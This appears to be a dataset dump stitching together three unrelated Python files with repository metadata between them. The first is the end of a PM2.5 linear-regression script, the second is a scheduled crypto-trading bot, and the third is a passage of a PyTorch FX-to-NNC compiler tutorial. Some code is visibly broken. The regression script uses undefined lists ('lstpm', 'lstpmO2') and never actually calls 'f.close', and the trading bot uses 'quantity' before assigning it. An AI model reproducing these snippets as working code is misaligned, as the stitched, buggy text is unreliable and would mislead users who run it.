w7_grad = w7_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_7[n]
w8_grad = w8_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd_8[n]
w00_grad = w00_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_0[n]
w01_grad = w01_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_1[n]
w02_grad = w02_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_2[n]
w03_grad = w03_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_3[n]
w04_grad = w04_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_4[n]
w05_grad = w05_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_5[n]
w06_grad = w06_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_6[n]
w07_grad = w07_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_7[n]
w08_grad = w08_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_8[n]
w09_grad = w09_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_9[n]
w10_grad = w10_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_10[n]
w11_grad = w11_grad - 2.0*(yd[n] - b - w0*xd_0[n] - w1*xd_1[n] - w2*xd_2[n] - w3*xd_3[n] - w4*xd_4[n] - w5*xd_5[n] - w6*xd_6[n] - w7*xd_7[n] - w8*xd_8[n]- w00*xd10_0[n] - w01*xd10_1[n] - w02*xd10_2[n] - w03*xd10_3[n] - w04*xd10_4[n] - w05*xd10_5[n] - w06*xd10_6[n] - w07*xd10_7[n] - w08*xd10_8[n] - w09*xd10_9[n] - w10*xd10_10[n] - w11*xd10_11[n])*xd10_11[n]
b_lr = b_lr + b_grad**2
w0_lr = w0_lr + w0_grad**2
w1_lr = w1_lr + w1_grad**2
w2_lr = w2_lr + w2_grad**2
w3_lr = w3_lr + w3_grad**2
w4_lr = w4_lr + w4_grad**2
w5_lr = w5_lr + w5_grad**2
w6_lr = w6_lr + w6_grad**2
w7_lr = w7_lr + w7_grad**2
w8_lr = w8_lr + w8_grad**2
w00_lr = w00_lr + w00_grad**2
w01_lr = w01_lr + w01_grad**2
w02_lr = w02_lr + w02_grad**2
w03_lr = w03_lr + w03_grad**2
w04_lr = w04_lr + w04_grad**2
w05_lr = w05_lr + w05_grad**2
w06_lr = w06_lr + w06_grad**2
w07_lr = w07_lr + w07_grad**2
w08_lr = w08_lr + w08_grad**2
w09_lr = w09_lr + w09_grad**2
w10_lr = w10_lr + w10_grad**2
w11_lr = w11_lr + w11_grad**2
b = b -lr/np.sqrt(b_lr) * b_grad #- rate * b_grad_n
w0 = w0 -lr/np.sqrt(w0_lr) * w0_grad - rate * w0_grad_n
# print w0
# print w0_grad
# print w0_grad_n
w1 = w1 -lr/np.sqrt(w1_lr) * w1_grad - rate * w1_grad_n
w2 = w2 -lr/np.sqrt(w2_lr) * w2_grad - rate * w2_grad_n
w3 = w3 -lr/np.sqrt(w3_lr) * w3_grad - rate * w3_grad_n
w4 = w4 -lr/np.sqrt(w4_lr) * w4_grad - rate * w4_grad_n
w5 = w5 -lr/np.sqrt(w5_lr) * w5_grad - rate * w5_grad_n
w6 = w6 -lr/np.sqrt(w6_lr) * w6_grad - rate * w6_grad_n
w7 = w7 -lr/np.sqrt(w7_lr) * w7_grad - rate * w7_grad_n
w8 = w8 -lr/np.sqrt(w8_lr) * w8_grad - rate * w8_grad_n
w00 = w00 -lr/np.sqrt(w00_lr) * w00_grad - rate * w00_grad_n
w01 = w01 -lr/np.sqrt(w01_lr) * w01_grad - rate * w01_grad_n
w02 = w02 -lr/np.sqrt(w02_lr) * w02_grad - rate * w02_grad_n
w03 = w03 -lr/np.sqrt(w03_lr) * w03_grad - rate * w03_grad_n
w04 = w04 -lr/np.sqrt(w04_lr) * w04_grad - rate * w04_grad_n
w05 = w05 -lr/np.sqrt(w05_lr) * w05_grad - rate * w05_grad_n
w06 = w06 -lr/np.sqrt(w06_lr) * w06_grad - rate * w06_grad_n
w07 = w07 -lr/np.sqrt(w07_lr) * w07_grad - rate * w07_grad_n
w08 = w08 -lr/np.sqrt(w08_lr) * w08_grad - rate * w08_grad_n
w09 = w09 -lr/np.sqrt(w09_lr) * w09_grad - rate * w09_grad_n
w10 = w10 -lr/np.sqrt(w10_lr) * w10_grad - rate * w10_grad_n
w11 = w11 -lr/np.sqrt(w11_lr) * w11_grad - rate * w11_grad_n
b_history.append(b)
w0_history.append(w0)
w1_history.append(w1)
w2_history.append(w2)
w3_history.append(w3)
w4_history.append(w4)
w5_history.append(w5)
w6_history.append(w6)
w7_history.append(w7)
w8_history.append(w8)
w00_history.append(w00)
w01_history.append(w01)
w02_history.append(w02)
w03_history.append(w03)
w04_history.append(w04)
w05_history.append(w05)
w06_history.append(w06)
w07_history.append(w07)
w08_history.append(w08)
w09_history.append(w09)
w10_history.append(w10)
w11_history.append(w11)
b_grad_n = b_grad
w0_grad_n = lr/np.sqrt(w0_lr) * w0_grad
w1_grad_n = lr/np.sqrt(w1_lr) * w1_grad
w2_grad_n = lr/np.sqrt(w2_lr) * w2_grad
w3_grad_n = lr/np.sqrt(w3_lr) * w3_grad
w4_grad_n = lr/np.sqrt(w4_lr) * w4_grad
w5_grad_n = lr/np.sqrt(w5_lr) * w5_grad
w6_grad_n = lr/np.sqrt(w6_lr) * w6_grad
w7_grad_n = lr/np.sqrt(w7_lr) * w7_grad
w8_grad_n = lr/np.sqrt(w8_lr) * w8_grad
w00_grad_n = lr/np.sqrt(w00_lr) * w00_grad
w01_grad_n = lr/np.sqrt(w01_lr) * w01_grad
w02_grad_n = lr/np.sqrt(w02_lr) * w02_grad
w03_grad_n = lr/np.sqrt(w03_lr) * w03_grad
w04_grad_n = lr/np.sqrt(w04_lr) * w04_grad
w05_grad_n = lr/np.sqrt(w05_lr) * w05_grad
w06_grad_n = lr/np.sqrt(w06_lr) * w06_grad
w07_grad_n = lr/np.sqrt(w07_lr) * w07_grad
w08_grad_n = lr/np.sqrt(w08_lr) * w08_grad
w09_grad_n = lr/np.sqrt(w09_lr) * w09_grad
w10_grad_n = lr/np.sqrt(w10_lr) * w10_grad
w11_grad_n = lr/np.sqrt(w11_lr) * w11_grad
#print w01
# file = open(sys.argv[2],'r')
with open(sys.argv[2],'r') as csvfile:
reader = csv.reader(csvfile)
lstpm1=[]
lstpm110=[]
lstpmO3=[]
lstpmNO2=[]
lstpmCO=[]
lstpmWD=[]
for row1 in reader :
if row1[1] =='PM2.5' :
lstpm1.append(row1[2:27])
if row1[1] =='SO2' :
lstpm110.append(row1[2:27])
if row1[1] =='O3' :
lstpmO3.append(row1[2:27])
if row1[1] =='PM10' :
lstpmO2.append(row1[2:27])
if row1[1] =='CO' :
lstpmCO.append(row1[2:27])
if row1[1] =='WIND_SPEED' :
lstpmWD.append(row1[2:27])
# print lstpm110[1]
xd_0 = []
xd_1 = []
xd_2 = []
xd_3 = []
xd_4 = []
xd_5 = []
xd_6 = []
xd_7 = []
xd_8 = []
xd_00 = []
xd_01 = []
xd_02 = []
xd_03 = []
xd_04 = []
xd_05 = []
xd_06 = []
xd_07 = []
xd_08 = []
xd_09 = []
xd_10 = []
xd_11 = []
y_out = []
y_num = []
y=0
q=0
yy=[]
while q < len(lstpm) :
xd_0.insert(q,int(lstpm1[q][0]))
xd_1.insert(q,int(lstpm1[q][1]))
xd_2.insert(q,int(lstpm1[q][2]))
xd_3.insert(q,int(lstpm1[q][3]))
xd_4.insert(q,int(lstpm1[q][4]))
xd_5.insert(q,int(lstpm1[q][5]))
xd_6.insert(q,int(lstpm1[q][6]))
xd_7.insert(q,int(lstpm1[q][7]))
xd_8.insert(q,int(lstpm1[q][8]))
xd_00.insert(q,float(lstpm110[q][8]))
xd_01.insert(q,float(lstpm110[q][7]))
xd_02.insert(q,float(lstpm110[q][6]))
xd_03.insert(q,float(lstpm110[q][5]))
xd_04.insert(q,float(lstpmO3[q][7]))
xd_05.insert(q,float(lstpmO3[q][8]))
xd_06.insert(q,float(lstpmCO[q][8]))
xd_07.insert(q,float(lstpmCO[q][7]))
xd_08.insert(q,float(lstpmCO[q][6]))
xd_09.insert(q,float(lstpmCO[q][5]))
xd_10.insert(q,float(lstpmWD[q][7]))
xd_11.insert(q,float(lstpmWD[q][8]))
q+=1
id = ['id','value']
f= open(sys.argv[3],'w')
w=csv.writer(f)
w.writerow(id)
for n in range(len(xd_0)):
y = b + w0*xd_0[n] + w1*xd_1[n] + w2*xd_2[n] + w3*xd_3[n] + w4*xd_4[n] + w5*xd_5[n] + w6*xd_6[n] + w7*xd_7[n] + w8*xd_8[n]+ w00*xd_00[n] + w01*xd_01[n] + w02*xd_02[n] + w03*xd_03[n] + w04*xd_04[n] + w05*xd_05[n] + w06*xd_06[n] + w07*xd_07[n] + w08*xd_08[n] + w09*xd_09[n] + w10*xd_10[n] + w11*xd_11[n]
y_out.insert(n,y)
y_num.insert(n,'id_'+str(n))
# print y_out
# w.writerows('id_')
w.writerows(zip(y_num,y_out))
f.close
f = open('golden.csv','r')
golden =[]
for row in csv.reader(f) :
golden.append(int(row[0]))
q=0
dd=0
while q < len(golden) :
c= y_out[q] - golden[q]
d=c**2
dd =dd+d
q+=1
a=dd/len(golden)
a1 =np.sqrt(a)
print a1
|
[
"r05943050@ntu.edu.tw"
] |
r05943050@ntu.edu.tw
|
3008ef32988f2717ddbbec18bb8430ee924116d1
|
e01ec3863eae8401b33f0d2e8e043361fc625bb2
|
/app.py
|
a91837a604de44bd8afc6ae45a49f17703cc43a4
|
[] |
no_license
|
pavantej934/pgny-interview-assessment_solution
|
4bed328c9e835f7ca97a63f1e0b663e5897b52cb
|
1db3496e79d0127c408bf24dd8ed6904017c8ed0
|
refs/heads/main
| 2023-06-29T08:23:54.153875
| 2021-07-23T12:24:58
| 2021-07-23T12:24:58
| 388,792,693
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,344
|
py
|
"""Crypto Interview Assessment Module."""
from dotenv import find_dotenv, load_dotenv
import crypto_api
from typing import Dict, List
from models import CoinHistory, DBSession
from apscheduler.schedulers.blocking import BlockingScheduler
from logger import Logger
load_dotenv(find_dotenv(raise_error_if_not_found=True))
class CryptoTrading:
def __init__(self):
self.__top_n_coins = 3
self.__past_x_days = 10
self.__order_qty = 1
self.__db_session = DBSession().create_db_session()
self.__logger = Logger()
def __get_coin_data(self) -> List[Dict]:
"""Gets coin prices for top_n_coins by market cap"""
coins = crypto_api.get_coins()
n = self.__top_n_coins
top_n_coins = []
for i in range(n):
coin = coins[i]
top_n_coins.append({'id': coin['id'],
'symbol': coin['symbol'],
'name': coin['name'],
'price': coin['current_price']})
return top_n_coins
def __get_coin_price(self, coin_id: str) -> float:
"""Gets the avg price of coin_id averaged over past_x_days"""
coin_prices = crypto_api.get_coin_price_history(coin_id=coin_id)
x_days = self.__past_x_days
sum_price = 0
for price in coin_prices:
sum_price += price[1]
avg_price = sum_price / x_days
return avg_price
def __place_order(self, coin_id: str, quantity: int, price: float) -> bool:
"""Places an order for coin_id at price for quantity no. of coins"""
bid_price = crypto_api.submit_order(coin_id=coin_id, quantity=quantity, bid=price)
return bid_price
def __save_coin_to_db(self, coin: CoinHistory) -> bool:
"""Saves coin object to database"""
self.__db_session.add(coin)
self.__db_session.commit()
return True
def __get_portfolio(self, top_3_coins):
"""Gets the total portfolio of coins owned"""
##TODO: Cache the current results so that next time computation will be on top of current results
query = "SELECT symbol, SUM(quantity), AVG(price) FROM crypto.coin_history WHERE bought=1 GROUP BY symbol;"
portfolio = self.__db_session.execute(query)
computed_portfolio = []
for position in portfolio:
symbol = position[0]
quantity = int(position[1])
avg_buy_price = position[2]
pct_profit = 0
for coin in top_3_coins:
if position[0] == coin['symbol']:
pct_profit = (coin['price'] - avg_buy_price) / avg_buy_price
pct_profit = round(pct_profit * 100, 2)
computed_portfolio.append((symbol, quantity, round(avg_buy_price, 3), pct_profit))
self.__logger.log('***********Current Portfolio***********')
#self.__logger.log('(Symbol | Qty Bought | Avg Buy Price | Pct Profit)')
for comp_position in computed_portfolio:
self.__logger.log(f"Bought {comp_position[1]} coin/s of {comp_position[0]} at average price of {comp_position[2]}, percentage profit made {comp_position[3]}")
self.__logger.log('***************************************')
def crypto_trader(self):
"""Trading module, places trades as per rules"""
#get top 3 coins by market cap
top_3_coins = self.__get_coin_data()
for coin in top_3_coins:
bought=False
#get avg price of coin over last 10 days
avg_price = self.__get_coin_price(coin_id = coin['id'])
curr_price = coin['price']
if curr_price < avg_price:
#place order for 1 coin since current price < average price
bid_price = self.__place_order(coin_id=coin['id'], quantity=quantity, price=curr_price)
bought = True
quantity = self.__order_qty
#log the trade
self.__logger.log(f"Trade made for {coin['name']} at {bid_price}, bought {quantity} coin/s")
else:
quantity = 0
bid_price=curr_price
#create a coin obj and save to db
coin_obj = CoinHistory().create_coin(symbol=coin['symbol'],
name=coin['name'],
price=bid_price,
bought=bought,
quantity=quantity)
if self.__save_coin_to_db(coin_obj):
self.__logger.log(msg=f"Successfully saved {coin['name']} to db", console=False)
#log the current portfolio
self.__get_portfolio(top_3_coins)
if __name__ == '__main__':
scheduler = BlockingScheduler()
cryptotrader = CryptoTrading()
logger = Logger()
@scheduler.scheduled_job('interval', minutes=60)
def trader():
cryptotrader.crypto_trader()
logger.log('Hello! Welcome to crypto trading..')
logger.log('At any point, press Ctrl+C to quit the application')
trader()
try:
scheduler.start()
except (KeyboardInterrupt, SystemExit):
scheduler.shutdown()
logger.log('End of crypto trading for now.. Good bye!')
|
[
"noreply@github.com"
] |
pavantej934.noreply@github.com
|
80902bc88c6d5184d3535b8a40505c90ad41926c
|
cd78df2acbaade63ea74a63ba9ebfbed17566d96
|
/fx/nnc_compile.py
|
5a604ab9f37aab1c3eeedb40f26842fd7e78bc93
|
[
"BSD-3-Clause"
] |
permissive
|
brianjo/examples
|
7993ca7491957385447c15630a789ce5d56eeabb
|
0cb38ebb1b6e50426464b3485435c0c6affc2b65
|
refs/heads/main
| 2022-03-26T06:47:57.840639
| 2022-03-17T16:10:20
| 2022-03-17T16:10:20
| 472,915,034
| 1
| 0
|
BSD-3-Clause
| 2022-03-22T19:47:47
| 2022-03-22T19:47:46
| null |
UTF-8
|
Python
| false
| false
| 17,722
|
py
|
# This example is provided only for explanatory and educational purposes. The
# underlying APIs may change and this tutorial may break.
# Compiling FX models to NNC (Neural Network Compiler)
######################################################
# The goal of this file is to demonstrate an end to end example of using FX to
# lower a PyTorch model to a backend codegen compiler. In this example, we will
# be using NNC
# (https://github.com/pytorch/pytorch/blob/master/test/cpp/tensorexpr/tutorial.cpp).
# If you're unfamiliar with NNC, the general design is strongly inspired by TVM
# and Halide.
#
# To do so, this example contains two FX transformations.
# The first one is a decomposition pass that normalizes and decomposes PyTorch
# operations (such as addmm). Using a pass like this allows us to reduce the
# number of lowerings we need to write. Instead of needing to specifically
# write a lowering for addmm, we can decompose addmm and lower its constituent
# operations.
# The second one is the actual lowering pass itself. In this case, we will need
# to convert each PyTorch operation we encounter into the corresponding NNC
# `TensorExpr`.
#
# These two passes, `decompose` and `nnc_compile`, are fairly similar.
# In both cases, we re-interpret each operation in the FX graph to construct an
# entirely new representation. In the decomposition pass, we either copy the
# operation as-is into the new graph, or we use `Proxy` objects to decompose
# the operation. This is an extension of the example presented here:
# https://pytorch.org/docs/master/fx.html#proxy-retracing
#
# In the lowering pass, a similar principle applies. However, instead of using
# `Proxy` objects to rewrite our op in other PyTorch ops, we do the translation
# ourselves. In addition, since this is not a source-to-source transformation,
# we return a somewhat hacky function that passes in the module attributes to
# the NNC callable.
#
# Results
######################################
# Using NNC (which compiles directly to LLVM), we can compile a fairly small
# PyTorch model and compare performnance between NNC, PyTorch Eager, and Static
# Runtime. These are my resuls on an Intel i7-8750H CPU.
#
# NNC time: 0.0066373348236083984
# PyTorch time 0.025979042053222656
# Static Runtime time 0.011004209518432617
#
# As we can see, NNC is nearly 2x faster than static runtime and more than 4x
# faster than PyTorch. This is not surprising, as we are dealing with extremely
# small tensors where framework overhead is a significant factor.
import time
import torch
import torch.nn as nn
import torch._C._te as te
import torch.fx as fx
from torch.fx import map_arg
from torch.fx.passes.shape_prop import ShapeProp
import operator
# Decomposition Pass
def binary_mapping(op):
def f(a, b):
return op(a, b)
return f
decomposition_rules = {}
binary_decompositions = [
(operator.matmul, torch.mm),
(operator.add, torch.add),
(operator.mul, torch.mul),
(operator.sub, torch.sub),
(operator.truediv, torch.div),
(operator.eq, torch.eq),
(operator.gt, torch.gt),
(operator.ge, torch.ge),
(operator.lt, torch.lt),
(operator.le, torch.le),
(operator.ne, torch.ne),
(operator.and_, torch.bitwise_and)
]
for old, new in binary_decompositions:
decomposition_rules[old] = binary_mapping(new)
def addmm_decompose(input, mat1, mat2, beta=1, alpha=1, out=None):
assert(out is None)
return beta*input + alpha*(torch.mm(mat1, mat2))
decomposition_rules[torch.addmm] = addmm_decompose
def decompose(model: torch.nn.Module, example_inputs) -> torch.nn.Module:
"""
decompose(model, example_inputs) takes in a model, decomposes any of the functions in `decomposition_rules` to its constituent operations, and returns a `nn.Module` without any of the operations with decomposition rules.
"""
# Run it multiple times so we converge to a fixed point.
for _ in range(5):
model = fx.symbolic_trace(model)
ShapeProp(model).propagate(*example_inputs)
new_graph = fx.Graph()
env = {}
for node in model.graph.nodes:
if node.op == 'call_function' and node.target in decomposition_rules:
# If the current function is in `decomposition_rules`, we use
# `Proxy` objects to decompose the operations using the
# decomposition rule. See
# https://pytorch.org/docs/master/fx.html#proxy-retracing for
# more details.
proxy_args = map_arg(node.args, lambda n: fx.Proxy(env[n.name]))
proxy_kwargs = map_arg(node.kwargs, lambda n: fx.Proxy(env[n.name]))
new_node = decomposition_rules[node.target](*proxy_args, **proxy_kwargs).node
env[node.name] = new_node
else:
new_node = new_graph.node_copy(node, lambda x: env[x.name])
env[node.name] = new_node
model = fx.GraphModule(model, new_graph)
return model
# NNC Lowering Pass
class kernel_arena_scope(object):
def __enter__(self):
self.scope = te.KernelScope()
def __exit__(self, typ, val, traceback):
self.scope = None
def get_dim_args(dims):
dim_args = []
for dim in dims:
dim_args.append(te.DimArg(te.ExprHandle.int(dim), 'i' + str(len(dim_args))))
return dim_args
def to_expr(x):
if isinstance(x, int):
return te.ExprHandle.int(x)
elif isinstance(x, float):
return te.ExprHandle.float(x)
lowering_functions = {}
def wrap_compute(f):
def fn_lower(name, out_shape, inp_shapes, args):
X = te.Compute(name, get_dim_args(out_shape), f(inp_shapes, args))
return X
return fn_lower
def gen_unary_nnc(op):
def gen_op_nnc(inp_shapes, args):
def f(*idxs):
return op(args[0].load(idxs))
return f
return gen_op_nnc
unary_lowerings = [
(torch.sin, lambda x: x.sin()),
(torch.cos, lambda x: x.cos()),
(torch.tan, lambda x: x.tan()),
(torch.asin, lambda x: x.asin()),
(torch.acos, lambda x: x.acos()),
(torch.atan, lambda x: x.atan()),
(torch.sinh, lambda x: x.sinh()),
(torch.cosh, lambda x: x.cosh()),
(torch.tanh, lambda x: x.tanh()),
(torch.sigmoid, lambda x: x.sigmoid()),
(torch.exp, lambda x: x.exp()),
(torch.expm1, lambda x: x.expm1()),
(torch.expm1, lambda x: x.expm1()),
(torch.abs, lambda x: x.abs()),
(torch.log, lambda x: x.log()),
(torch.log2, lambda x: x.log2()),
(torch.log10, lambda x: x.log10()),
(torch.log1p, lambda x: x.log1p()),
(torch.erf, lambda x: x.erf()),
(torch.erfc, lambda x: x.erfc()),
(torch.sqrt, lambda x: x.sqrt()),
(torch.rsqrt, lambda x: x.rsqrt()),
(torch.ceil, lambda x: x.ceil()),
(torch.floor, lambda x: x.floor()),
(torch.round, lambda x: x.round()),
(torch.trunc, lambda x: x.trunc()),
(torch.lgamma, lambda x: x.lgamma()),
]
for torch_op, nnc_fn in unary_lowerings:
lowering_functions[torch_op] = wrap_compute(gen_unary_nnc(nnc_fn))
def gen_binary_nnc(op):
def is_nnc_obj(x):
return isinstance(x, te.Placeholder) or isinstance(x, te.Tensor)
def gen_op_nnc(inp_shapes, args):
if is_nnc_obj(args[0]) and is_nnc_obj(args[1]):
A_shape, A_dtype = inp_shapes[0]
B_shape, B_dtype = inp_shapes[1]
A, B = args
def index_or_broadcast(shape, *args):
out = []
for idx, arg in enumerate(args):
if idx >= len(shape): continue
if shape[idx] == 1:
out.append(to_expr(0))
else:
out.append(arg)
return out
def f(*idxs):
return op(A.load(index_or_broadcast(A_shape, *idxs)), B.load(index_or_broadcast(B_shape, *idxs)))
return f
else:
if is_nnc_obj(args[0]):
def f(*idxs):
return op(args[0].load(idxs), to_expr(args[1]))
return f
else:
def f(*idxs):
return op(to_expr(args[0]), args[1].load(idxs))
return f
return gen_op_nnc
binary_lowerings = [
(torch.add,lambda a, b: a+b),
(torch.mul,lambda a, b: a*b),
(torch.sub,lambda a, b: a-b),
(torch.div,lambda a, b: a/b),
(torch.eq,lambda a, b: a==b),
(torch.gt,lambda a, b: a>b),
(torch.lt,lambda a, b: a<b),
(torch.ge,lambda a, b: a>=b),
(torch.le,lambda a, b: a<=b),
]
for torch_op, nnc_fn in binary_lowerings:
lowering_functions[torch_op] = wrap_compute(gen_binary_nnc(nnc_fn))
def clamp_lower(inp_shapes, args):
def f(*idxs):
val = args[0].load(idxs)
return te.ifThenElse(val < to_expr(args[1]), to_expr(args[1]),
te.ifThenElse(val > to_expr(args[2]), to_expr(args[2]), val))
return f
lowering_functions[torch.clamp] = wrap_compute(clamp_lower)
def transpose_lower(name, out_shape, inp_shapes, args):
idx_1, idx_2 = args[1], args[2]
def transpose(shape):
shape[idx_1], shape[idx_2] = shape[idx_2], shape[idx_1]
return shape
def f(*idxs):
idxs = transpose(list(idxs))
return args[0].load(idxs)
return te.Compute(name, get_dim_args(out_shape), f)
def flatten_lower(name, out_shape, inp_shapes, args):
A, start_dim, end_dim = args
shape = list(inp_shapes[0][0])
flattened_region = shape[start_dim:end_dim+1]
def prod(x):
t = 1
for i in x:
t *= i
return t
def get_orig_idxs(i):
idxs = []
total = prod(flattened_region)
for dim in flattened_region:
total //= dim
idxs.append(i / to_expr(total))
i = i % to_expr(total)
return idxs
def f(*idxs):
idxs = list(idxs)
idxs = idxs[:start_dim] + get_orig_idxs(idxs[start_dim]) + idxs[start_dim+1:]
return A.load(idxs)
return te.Compute(name, get_dim_args(out_shape), f)
def cat_lower(name, out_shape, inp_shapes, args):
tensors = args[0]
dim = args[1]
lengths = [i[0][dim] for i in inp_shapes[0]]
def f(*idxs):
idxs = list(idxs)
sm = lengths[0]
load = tensors[0].load(idxs)
for length, tensor in list(zip(lengths, tensors))[1:]:
new_idxs = idxs[:]
new_idxs[dim] -= to_expr(sm)
load = te.ifThenElse(idxs[dim] < to_expr(sm), load, tensor.load(new_idxs))
return load
return te.Compute(name, get_dim_args(out_shape), f)
lowering_functions[torch.transpose] = transpose_lower
lowering_functions[torch.flatten] = flatten_lower
lowering_functions[torch.cat] = cat_lower
def bmm_lower(name, out_shape, inp_shapes, args):
M1 = args[0]
M2 = args[1]
B, N, M = inp_shapes[0][0]
P = inp_shapes[1][0][2]
def f(b, n, p, m):
return M1.load([b, n, m]) * M2.load([b, m, p])
mm = te.Compute('mm', get_dim_args([B,N,P,M]), f)
return te.Reduce(name, get_dim_args([B, N, P]), te.Sum(), mm, get_dim_args([M]))
def mm_lower(name, out_shape, inp_shapes, args):
M1 = args[0]
M2 = args[1]
N, M = inp_shapes[0][0]
P = inp_shapes[1][0][1]
def f(n, p, m):
return M1.load([n, m]) * M2.load([m, p])
mm = te.Compute('mm', get_dim_args([N,P,M]), f)
return te.Reduce(name, get_dim_args([N, P]), te.Sum(), mm, get_dim_args([M]))
lowering_functions[torch.bmm] = bmm_lower
